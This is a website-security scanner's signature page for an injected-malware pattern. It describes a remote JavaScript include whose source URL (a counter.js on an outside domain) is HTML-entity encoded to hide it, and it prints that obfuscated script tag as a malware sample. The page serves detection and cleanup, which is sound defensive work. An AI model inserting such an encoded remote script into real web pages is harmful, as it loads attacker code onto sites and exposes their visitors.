SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwjs4351

malware-entry-mwjs4351

Description:

A remote javascript was found on the site. It was also HTML encoded to make harder to identify where the malware was coming from.

 

Domains used in this attack:


http://howhigh.xz.lt/pub/counter.js
(and many others)

Affecting:

Any web site sites (no specific target)

 

Clean up:

This malware is generally hidden inside the javascript files or at the bottom of the HTML or PHP files. Sign up here to get it clean up: Signup

 

Malware dump (sample of malware):

<script language="JavaScript" src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#104;&#111;&#119;
&#104;&#105;&#103;&#104;&#46;&#120;&#122;&#46;&#108;&#116;&#47;&#112;&#117;&#98;&#47;counter.js"></script>